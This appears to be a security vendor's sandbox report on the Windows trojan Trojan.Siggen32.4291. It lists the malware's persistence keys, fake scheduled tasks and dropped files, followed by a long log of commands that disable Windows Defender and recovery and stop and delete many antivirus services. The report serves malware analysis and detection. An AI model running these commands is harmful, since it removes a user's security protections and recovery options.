Trojan.Siggen32.4291

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'AppInit_DLLs' = '<SYSTEM32>\svchost8325.exe'
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'LoadAppInit_DLLs' = '00000001'
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'AppInit_DLLs' = '<SYSTEM32>\svchost8325.exe'
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'LoadAppInit_DLLs' = '00000001'
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] 'AppInit_DLLs' = '<SYSTEM32>\svchost8325.exe'
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] 'LoadAppInit_DLLs' = '00000001'
[HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'AppInit_DLLs' = '<SYSTEM32>\svchost8325.exe'
[HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'LoadAppInit_DLLs' = '00000001'
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'UserInit' = '<SYSTEM32>\svchost8325.exe,<SYSTEM32>\userinit.exe,'
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'AppInit_DLLs' = '<SYSTEM32>\svchost8325.exe'
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'LoadAppInit_DLLs' = '00000001'
[HKCU\Environment] 'UserInitMprLogonScript' = '<SYSTEM32>\svchost8325.exe'
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment] 'UserInitMprLogonScript' = '<SYSTEM32>\svchost8325.exe'

Creates or modifies the following files

<SYSTEM32>\tasks\microsoft\windows\windowsupdate\windowsupdatetask
<SYSTEM32>\tasks\microsoft\windows\application experience\programdataupdater
<SYSTEM32>\tasks\microsoft\windows\customer experience improvement program\consolidator
<SYSTEM32>\tasks\microsoft\windows\defrag\scheduleddefrag
<SYSTEM32>\tasks\microsoft\windows\diagnosis\scheduled

Malicious functions

To complicate detection of its presence in the operating system,

blocks execution of the following system utilities:

Windows Task Manager (Taskmgr)
Registry Editor (RegEdit)
Windows Defender

blocks the following features:

System Restore (SR)

modifies the following system settings:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'DisallowRun' = '00000001'

adds antivirus exclusion:

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $true;"Set-MpPreference -DisableBehaviorMonitoring $true; Set-MpPreference -DisableBlockAtFirstSeen $true; Set-MpPreference -DisableIOAVPro...

Executes the following

'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="BlockWireshark" dir=in action=block protocol=TCP localport=1774,27017,27018,27019,27020

Launches a large number of processes

Terminates or attempts to terminate

the following system processes:

<SYSTEM32>\cmd.exe

Modifies file system

Creates the following files

%TEMP%\_mei37082\pythonwin\mfc140u.dll
%TEMP%\_mei37082\pythonwin\win32ui.pyd
%TEMP%\_mei37082\vcruntime140.dll
%TEMP%\_mei37082\vcruntime140_1.dll
%TEMP%\_mei37082\_bz2.pyd
%TEMP%\_mei37082\_ctypes.pyd
%TEMP%\_mei37082\_decimal.pyd
%TEMP%\_mei37082\_hashlib.pyd
%TEMP%\_mei37082\_lzma.pyd
%TEMP%\_mei37082\_socket.pyd
%TEMP%\_mei37082\_wmi.pyd
%TEMP%\_mei37082\base_library.zip
%TEMP%\_mei37082\libcrypto-3.dll
%TEMP%\_mei37082\libffi-8.dll
%TEMP%\_mei37082\psutil\_psutil_windows.pyd
%TEMP%\_mei37082\python3.dll
%TEMP%\_mei37082\python312.dll
%TEMP%\_mei37082\pywin32_system32\pythoncom312.dll
%TEMP%\_mei37082\pywin32_system32\pywintypes312.dll
%TEMP%\_mei37082\select.pyd
%TEMP%\_mei37082\unicodedata.pyd
%TEMP%\_mei37082\win32\_win32sysloader.pyd
%TEMP%\_mei37082\win32\perfmon.pyd
%TEMP%\_mei37082\win32\servicemanager.pyd
%TEMP%\_mei37082\win32\win32api.pyd
%TEMP%\_mei37082\win32\win32event.pyd
%TEMP%\_mei37082\win32\win32evtlog.pyd
%TEMP%\_mei37082\win32\win32process.pyd
%TEMP%\_mei37082\win32\win32security.pyd
%TEMP%\_mei37082\win32\win32service.pyd
%TEMP%\_mei37082\win32\win32trace.pyd
%TEMP%\_mei37082\win32\win32ts.pyd
%TEMP%\gen_py\3.12\__init__.py
%TEMP%\gen_py\3.12\dicts.dat
<SYSTEM32>\svchost8325.exe
%TEMP%\5h68kq3w
%TEMP%\task_7793.xml
%TEMP%\task_3143.xml
%TEMP%\task_9091.xml
%TEMP%\task_5488.xml
%TEMP%\task_1335.xml
%LOCALAPPDATA%\google\chrome\user data\default\extensions\helper5781\manifest.json
%LOCALAPPDATA%\google\chrome\user data\default\extensions\helper5781\background.js
%APPDATA%\mozilla\firefox\profiles\helper8257\manifest.json
%APPDATA%\mozilla\firefox\profiles\helper8257\background.js

Sets the 'hidden' attribute to the following files

<SYSTEM32>\svchost8325.exe

Deletes the following system files

<SYSTEM32>\windowspowershell\v1.0\modules\defender\defender.psd1
<SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mpcomputerstatus.cdxml
<SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mppreference.cdxml
<SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mpscan.cdxml
<SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mpsignature.cdxml
<SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mpthreat.cdxml
<SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mpthreatcatalog.cdxml
<SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mpthreatdetection.cdxml
<SYSTEM32>\windowspowershell\v1.0\modules\defender\msft_mpwdoscan.cdxml

Deletes following files that it created itself

%TEMP%\5h68kq3w
%TEMP%\task_7793.xml
%TEMP%\task_3143.xml
%TEMP%\task_9091.xml
%TEMP%\task_5488.xml
%TEMP%\task_1335.xml

Miscellaneous

Restarts the analyzed sample

Executes the following

'<SYSTEM32>\cmd.exe' /c "systeminfo"
'<SYSTEM32>\systeminfo.exe'
'<SYSTEM32>\cmd.exe' /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
'<SYSTEM32>\bcdedit.exe' /set {default} bootstatuspolicy ignoreallfailures
'<SYSTEM32>\cmd.exe' /c "bcdedit /set {default} recoveryenabled no"
'<SYSTEM32>\cmd.exe' /c "bcdedit /set {default} advancedoptions false"
'<SYSTEM32>\bcdedit.exe' /set {default} advancedoptions false
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot" /v OptionValue /t REG_DWORD /d 1 /f"
'<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot" /v OptionValue /t REG_DWORD /d 1 /f
'<SYSTEM32>\cmd.exe' /c "powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true;"Set-MpPreference -DisableBehaviorMonitoring $true; Set-MpPreference -DisableBlockAtFirstSeen $true; Set-MpPreference ...
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
'<SYSTEM32>\cmd.exe' /c "sc stop WinDefend"
'<SYSTEM32>\sc.exe' stop WinDefend
'<SYSTEM32>\cmd.exe' /c "sc config WinDefend start= disabled"
'<SYSTEM32>\sc.exe' config WinDefend start= disabled
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
'<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f"
'<SYSTEM32>\cmd.exe' /c "schtasks /create /tn Microsoft\Windows\WindowsUpdate\WindowsUpdateTask /xml %TEMP%\task_7793.xml /f"
'<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
'<SYSTEM32>\schtasks.exe' /create /tn Microsoft\Windows\WindowsUpdate\WindowsUpdateTask /xml %TEMP%\task_7793.xml /f
'<SYSTEM32>\cmd.exe' /c "sc stop WdNisSvc"
'<SYSTEM32>\cmd.exe' /c "netsh advfirewall firewall add rule name="BlockWireshark" dir=in action=block protocol=TCP localport=1774,27017,27018,27019,27020"
'<SYSTEM32>\cmd.exe' /c "schtasks /create /tn "Microsoft\Windows\Application Experience\ProgramDataUpdater" /xml %TEMP%\task_3143.xml /f"
'<SYSTEM32>\sc.exe' stop WdNisSvc
'<SYSTEM32>\schtasks.exe' /create /tn "Microsoft\Windows\Application Experience\ProgramDataUpdater" /xml %TEMP%\task_3143.xml /f
'<SYSTEM32>\cmd.exe' /c "sc config WdNisSvc start= disabled"
'<SYSTEM32>\cmd.exe' /c "schtasks /create /tn "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /xml %TEMP%\task_9091.xml /f"
'<SYSTEM32>\sc.exe' config WdNisSvc start= disabled
'<SYSTEM32>\cmd.exe' /c "sc stop Sense"
'<SYSTEM32>\schtasks.exe' /create /tn "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /xml %TEMP%\task_9091.xml /f
'<SYSTEM32>\sc.exe' stop Sense
'<SYSTEM32>\cmd.exe' /c "schtasks /create /tn Microsoft\Windows\Defrag\ScheduledDefrag /xml %TEMP%\task_5488.xml /f"
'<SYSTEM32>\cmd.exe' /c "sc config Sense start= disabled"
'<SYSTEM32>\schtasks.exe' /create /tn Microsoft\Windows\Defrag\ScheduledDefrag /xml %TEMP%\task_5488.xml /f
'<SYSTEM32>\sc.exe' config Sense start= disabled
'<SYSTEM32>\cmd.exe' /c "sc stop SecurityHealthService"
'<SYSTEM32>\cmd.exe' /c "schtasks /create /tn Microsoft\Windows\Diagnosis\Scheduled /xml %TEMP%\task_1335.xml /f"
'<SYSTEM32>\sc.exe' stop SecurityHealthService
'<SYSTEM32>\schtasks.exe' /create /tn Microsoft\Windows\Diagnosis\Scheduled /xml %TEMP%\task_1335.xml /f
'<SYSTEM32>\cmd.exe' /c "sc config SecurityHealthService start= disabled"
'<SYSTEM32>\cmd.exe' /c "sc create WinUpdate3910 "binPath= \"<SYSTEM32>\svchost8325.exe\"" "type= own" "start= auto" "error= normal""
'<SYSTEM32>\sc.exe' config SecurityHealthService start= disabled
'<SYSTEM32>\sc.exe' create WinUpdate3910 "binPath= \"<SYSTEM32>\svchost8325.exe\"" "type= own" "start= auto" "error= normal"
'<SYSTEM32>\cmd.exe' /c "sc description WinUpdate3910 "Windows Update Service""
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f"
'<SYSTEM32>\sc.exe' description WinUpdate3910 "Windows Update Service"
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
'<SYSTEM32>\cmd.exe' /c "powershell -Command " $WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut(\"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Windows Update.lnk\") $S...
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"
'<SYSTEM32>\cmd.exe' /c "powershell -Command " $WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut(\"%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\Windows Update.l...
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f"
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f"
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f
'<SYSTEM32>\cmd.exe' /c "sc delete WinDefend"
'<SYSTEM32>\sc.exe' delete WinDefend
'<SYSTEM32>\cmd.exe' /c "sc delete WdNisSvc"
'<SYSTEM32>\sc.exe' delete WdNisSvc
'<SYSTEM32>\cmd.exe' /c "sc delete Sense"
'<SYSTEM32>\sc.exe' delete Sense
'<SYSTEM32>\cmd.exe' /c "sc delete SecurityHealthService"
'<SYSTEM32>\sc.exe' delete SecurityHealthService
'<SYSTEM32>\cmd.exe' /c "sc stop kavfs"
'<SYSTEM32>\sc.exe' stop kavfs
'<SYSTEM32>\cmd.exe' /c "sc delete kavfs"
'<SYSTEM32>\sc.exe' delete kavfs
'<SYSTEM32>\cmd.exe' /c "sc stop kavfss"
'<SYSTEM32>\sc.exe' stop kavfss
'<SYSTEM32>\cmd.exe' /c "sc delete kavfss"
'<SYSTEM32>\sc.exe' delete kavfss
'<SYSTEM32>\cmd.exe' /c "sc stop klim5"
'<SYSTEM32>\sc.exe' stop klim5
'<SYSTEM32>\cmd.exe' /c "sc delete klim5"
'<SYSTEM32>\sc.exe' delete klim5
'<SYSTEM32>\cmd.exe' /c "sc stop kl1"
'<SYSTEM32>\sc.exe' stop kl1
'<SYSTEM32>\cmd.exe' /c "sc delete kl1"
'<SYSTEM32>\sc.exe' delete kl1
'<SYSTEM32>\cmd.exe' /c "sc stop klif"
'<SYSTEM32>\sc.exe' stop klif
'<SYSTEM32>\cmd.exe' /c "sc delete klif"
'<SYSTEM32>\sc.exe' delete klif
'<SYSTEM32>\cmd.exe' /c "sc stop kneps"
'<SYSTEM32>\sc.exe' stop kneps
'<SYSTEM32>\cmd.exe' /c "sc delete kneps"
'<SYSTEM32>\sc.exe' delete kneps
'<SYSTEM32>\cmd.exe' /c "sc stop Norton"
'<SYSTEM32>\sc.exe' stop Norton
'<SYSTEM32>\cmd.exe' /c "sc delete Norton"
'<SYSTEM32>\sc.exe' delete Norton
'<SYSTEM32>\cmd.exe' /c "sc stop N360"
'<SYSTEM32>\sc.exe' stop N360
'<SYSTEM32>\cmd.exe' /c "sc delete N360"
'<SYSTEM32>\sc.exe' delete N360
'<SYSTEM32>\cmd.exe' /c "sc stop NIS"
'<SYSTEM32>\sc.exe' stop NIS
'<SYSTEM32>\cmd.exe' /c "sc delete NIS"
'<SYSTEM32>\sc.exe' delete NIS
'<SYSTEM32>\cmd.exe' /c "sc stop NAV"
'<SYSTEM32>\sc.exe' stop NAV
'<SYSTEM32>\cmd.exe' /c "sc delete NAV"
'<SYSTEM32>\sc.exe' delete NAV
'<SYSTEM32>\cmd.exe' /c "sc stop nisSrv"
'<SYSTEM32>\sc.exe' stop nisSrv
'<SYSTEM32>\cmd.exe' /c "sc delete nisSrv"
'<SYSTEM32>\sc.exe' delete nisSrv
'<SYSTEM32>\cmd.exe' /c "sc stop McAfee"
'<SYSTEM32>\sc.exe' stop McAfee
'<SYSTEM32>\cmd.exe' /c "sc delete McAfee"
'<SYSTEM32>\sc.exe' delete McAfee
'<SYSTEM32>\cmd.exe' /c "sc stop mcshield"
'<SYSTEM32>\sc.exe' stop mcshield
'<SYSTEM32>\cmd.exe' /c "sc delete mcshield"
'<SYSTEM32>\sc.exe' delete mcshield
'<SYSTEM32>\cmd.exe' /c "sc stop mfefire"
'<SYSTEM32>\sc.exe' stop mfefire
'<SYSTEM32>\cmd.exe' /c "sc delete mfefire"
'<SYSTEM32>\sc.exe' delete mfefire
'<SYSTEM32>\cmd.exe' /c "sc stop mfemms"
'<SYSTEM32>\sc.exe' stop mfemms
'<SYSTEM32>\cmd.exe' /c "sc delete mfemms"
'<SYSTEM32>\sc.exe' delete mfemms
'<SYSTEM32>\cmd.exe' /c "sc stop avast"
'<SYSTEM32>\sc.exe' stop avast
'<SYSTEM32>\cmd.exe' /c "sc delete avast"
'<SYSTEM32>\sc.exe' delete avast
'<SYSTEM32>\cmd.exe' /c "sc stop avastsvc"
'<SYSTEM32>\sc.exe' stop avastsvc
'<SYSTEM32>\cmd.exe' /c "sc delete avastsvc"
'<SYSTEM32>\sc.exe' delete avastsvc
'<SYSTEM32>\cmd.exe' /c "sc stop afwServ"
'<SYSTEM32>\sc.exe' stop afwServ
'<SYSTEM32>\cmd.exe' /c "sc delete afwServ"
'<SYSTEM32>\sc.exe' delete afwServ
'<SYSTEM32>\cmd.exe' /c "sc stop AVG"
'<SYSTEM32>\sc.exe' stop AVG
'<SYSTEM32>\cmd.exe' /c "sc delete AVG"
'<SYSTEM32>\sc.exe' delete AVG
'<SYSTEM32>\cmd.exe' /c "sc stop avgfws"
'<SYSTEM32>\sc.exe' stop avgfws
'<SYSTEM32>\cmd.exe' /c "sc delete avgfws"
'<SYSTEM32>\sc.exe' delete avgfws
'<SYSTEM32>\cmd.exe' /c "sc stop avgwd"
'<SYSTEM32>\sc.exe' stop avgwd
'<SYSTEM32>\cmd.exe' /c "sc delete avgwd"
'<SYSTEM32>\sc.exe' delete avgwd
'<SYSTEM32>\cmd.exe' /c "sc stop avgemc"
'<SYSTEM32>\sc.exe' stop avgemc
'<SYSTEM32>\cmd.exe' /c "sc delete avgemc"
'<SYSTEM32>\sc.exe' delete avgemc
'<SYSTEM32>\cmd.exe' /c "sc stop Bitdefender"
'<SYSTEM32>\sc.exe' stop Bitdefender
'<SYSTEM32>\cmd.exe' /c "sc delete Bitdefender"
'<SYSTEM32>\sc.exe' delete Bitdefender
'<SYSTEM32>\cmd.exe' /c "sc stop bdagent"
'<SYSTEM32>\sc.exe' stop bdagent
'<SYSTEM32>\cmd.exe' /c "sc delete bdagent"
'<SYSTEM32>\sc.exe' delete bdagent
'<SYSTEM32>\cmd.exe' /c "sc stop vsserv"
'<SYSTEM32>\sc.exe' stop vsserv
'<SYSTEM32>\cmd.exe' /c "sc delete vsserv"
'<SYSTEM32>\sc.exe' delete vsserv
'<SYSTEM32>\cmd.exe' /c "sc stop ESET"
'<SYSTEM32>\sc.exe' stop ESET
'<SYSTEM32>\cmd.exe' /c "sc delete ESET"
'<SYSTEM32>\sc.exe' delete ESET
'<SYSTEM32>\cmd.exe' /c "sc stop ekrn"
'<SYSTEM32>\sc.exe' stop ekrn
'<SYSTEM32>\cmd.exe' /c "sc delete ekrn"
'<SYSTEM32>\sc.exe' delete ekrn
'<SYSTEM32>\cmd.exe' /c "sc stop ehdrv"
'<SYSTEM32>\sc.exe' stop ehdrv
'<SYSTEM32>\cmd.exe' /c "sc delete ehdrv"
'<SYSTEM32>\sc.exe' delete ehdrv
'<SYSTEM32>\cmd.exe' /c "sc stop Avira"
'<SYSTEM32>\sc.exe' stop Avira
'<SYSTEM32>\cmd.exe' /c "sc delete Avira"
'<SYSTEM32>\sc.exe' delete Avira
'<SYSTEM32>\cmd.exe' /c "sc stop avguard"
'<SYSTEM32>\sc.exe' stop avguard
'<SYSTEM32>\cmd.exe' /c "sc delete avguard"
'<SYSTEM32>\sc.exe' delete avguard
'<SYSTEM32>\cmd.exe' /c "sc stop avshadow"
'<SYSTEM32>\sc.exe' stop avshadow
'<SYSTEM32>\cmd.exe' /c "sc delete avshadow"
'<SYSTEM32>\sc.exe' delete avshadow
'<SYSTEM32>\cmd.exe' /c "sc stop Trend Micro"
'<SYSTEM32>\sc.exe' stop Trend Micro
'<SYSTEM32>\cmd.exe' /c "sc delete Trend Micro"
'<SYSTEM32>\sc.exe' delete Trend Micro
'<SYSTEM32>\cmd.exe' /c "sc stop tmccsf"
'<SYSTEM32>\sc.exe' stop tmccsf
'<SYSTEM32>\cmd.exe' /c "sc delete tmccsf"
'<SYSTEM32>\sc.exe' delete tmccsf
'<SYSTEM32>\cmd.exe' /c "sc stop tmlisten"
'<SYSTEM32>\sc.exe' stop tmlisten
'<SYSTEM32>\cmd.exe' /c "sc delete tmlisten"
'<SYSTEM32>\sc.exe' delete tmlisten
'<SYSTEM32>\cmd.exe' /c "sc stop Malwarebytes"
'<SYSTEM32>\sc.exe' stop Malwarebytes
'<SYSTEM32>\cmd.exe' /c "sc delete Malwarebytes"
'<SYSTEM32>\sc.exe' delete Malwarebytes
'<SYSTEM32>\cmd.exe' /c "sc stop MBAMService"
'<SYSTEM32>\sc.exe' stop MBAMService
'<SYSTEM32>\cmd.exe' /c "sc delete MBAMService"
'<SYSTEM32>\sc.exe' delete MBAMService
'<SYSTEM32>\cmd.exe' /c "sc stop MBEndpointAgent"
'<SYSTEM32>\sc.exe' stop MBEndpointAgent
'<SYSTEM32>\cmd.exe' /c "sc delete MBEndpointAgent"
'<SYSTEM32>\sc.exe' delete MBEndpointAgent
'<SYSTEM32>\cmd.exe' /c "sc stop Comodo"
'<SYSTEM32>\sc.exe' stop Comodo
'<SYSTEM32>\cmd.exe' /c "sc delete Comodo"
'<SYSTEM32>\sc.exe' delete Comodo
'<SYSTEM32>\cmd.exe' /c "sc stop cmdagent"
'<SYSTEM32>\sc.exe' stop cmdagent
'<SYSTEM32>\cmd.exe' /c "sc delete cmdagent"
'<SYSTEM32>\sc.exe' delete cmdagent
'<SYSTEM32>\cmd.exe' /c "sc stop cavwp"
'<SYSTEM32>\sc.exe' stop cavwp
'<SYSTEM32>\cmd.exe' /c "sc delete cavwp"
'<SYSTEM32>\sc.exe' delete cavwp
'<SYSTEM32>\cmd.exe' /c "sc stop Panda"
'<SYSTEM32>\sc.exe' stop Panda
'<SYSTEM32>\cmd.exe' /c "sc delete Panda"
'<SYSTEM32>\sc.exe' delete Panda
'<SYSTEM32>\cmd.exe' /c "sc stop psanhost"
'<SYSTEM32>\sc.exe' stop psanhost
'<SYSTEM32>\cmd.exe' /c "sc delete psanhost"
'<SYSTEM32>\sc.exe' delete psanhost
'<SYSTEM32>\cmd.exe' /c "sc stop pavsrv"
'<SYSTEM32>\sc.exe' stop pavsrv
'<SYSTEM32>\cmd.exe' /c "sc delete pavsrv"
'<SYSTEM32>\sc.exe' delete pavsrv
'<SYSTEM32>\cmd.exe' /c "sc stop Webroot"
'<SYSTEM32>\sc.exe' stop Webroot
'<SYSTEM32>\cmd.exe' /c "sc delete Webroot"
'<SYSTEM32>\sc.exe' delete Webroot
'<SYSTEM32>\cmd.exe' /c "sc stop wrsssdk"
'<SYSTEM32>\sc.exe' stop wrsssdk
'<SYSTEM32>\cmd.exe' /c "sc delete wrsssdk"
'<SYSTEM32>\sc.exe' delete wrsssdk
'<SYSTEM32>\cmd.exe' /c "sc stop wrcoreservice"
'<SYSTEM32>\sc.exe' stop wrcoreservice
'<SYSTEM32>\cmd.exe' /c "sc delete wrcoreservice"
'<SYSTEM32>\sc.exe' delete wrcoreservice
'<SYSTEM32>\cmd.exe' /c "sc stop BullGuard"
'<SYSTEM32>\sc.exe' stop BullGuard
'<SYSTEM32>\cmd.exe' /c "sc delete BullGuard"
'<SYSTEM32>\sc.exe' delete BullGuard
'<SYSTEM32>\cmd.exe' /c "sc stop bullguardservice"
'<SYSTEM32>\sc.exe' stop bullguardservice
'<SYSTEM32>\cmd.exe' /c "sc delete bullguardservice"
'<SYSTEM32>\sc.exe' delete bullguardservice
'<SYSTEM32>\cmd.exe' /c "sc stop F-Secure"
'<SYSTEM32>\sc.exe' stop F-Secure
'<SYSTEM32>\cmd.exe' /c "sc delete F-Secure"
'<SYSTEM32>\sc.exe' delete F-Secure
'<SYSTEM32>\cmd.exe' /c "sc stop fshoster"
'<SYSTEM32>\sc.exe' stop fshoster
'<SYSTEM32>\cmd.exe' /c "sc delete fshoster"
'<SYSTEM32>\sc.exe' delete fshoster
'<SYSTEM32>\cmd.exe' /c "sc stop fsma"
'<SYSTEM32>\sc.exe' stop fsma
'<SYSTEM32>\cmd.exe' /c "sc delete fsma"
'<SYSTEM32>\sc.exe' delete fsma
'<SYSTEM32>\cmd.exe' /c "sc stop Sophos"
'<SYSTEM32>\sc.exe' stop Sophos
'<SYSTEM32>\cmd.exe' /c "sc delete Sophos"
'<SYSTEM32>\sc.exe' delete Sophos
'<SYSTEM32>\cmd.exe' /c "sc stop savservice"
'<SYSTEM32>\sc.exe' stop savservice
'<SYSTEM32>\cmd.exe' /c "sc delete savservice"
'<SYSTEM32>\sc.exe' delete savservice
'<SYSTEM32>\cmd.exe' /c "sc stop swi_service"
'<SYSTEM32>\sc.exe' stop swi_service
'<SYSTEM32>\cmd.exe' /c "sc delete swi_service"
'<SYSTEM32>\sc.exe' delete swi_service
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\KasperskyLab" /f"
'<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\KasperskyLab" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\KasperskyLab" /f"
'<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\KasperskyLab" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\Norton" /f"
'<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Norton" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\Norton" /f"
'<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\Norton" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\McAfee" /f"
'<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\McAfee" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\McAfee" /f"
'<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\McAfee" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\Avast" /f"
'<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Avast" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\Avast" /f"
'<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\Avast" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\AVG" /f"
'<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\AVG" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\AVG" /f"
'<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\AVG" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\Bitdefender" /f"
'<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Bitdefender" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\Bitdefender" /f"
'<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\Bitdefender" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\ESET" /f"
'<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\ESET" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\ESET" /f"
'<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\ESET" /f
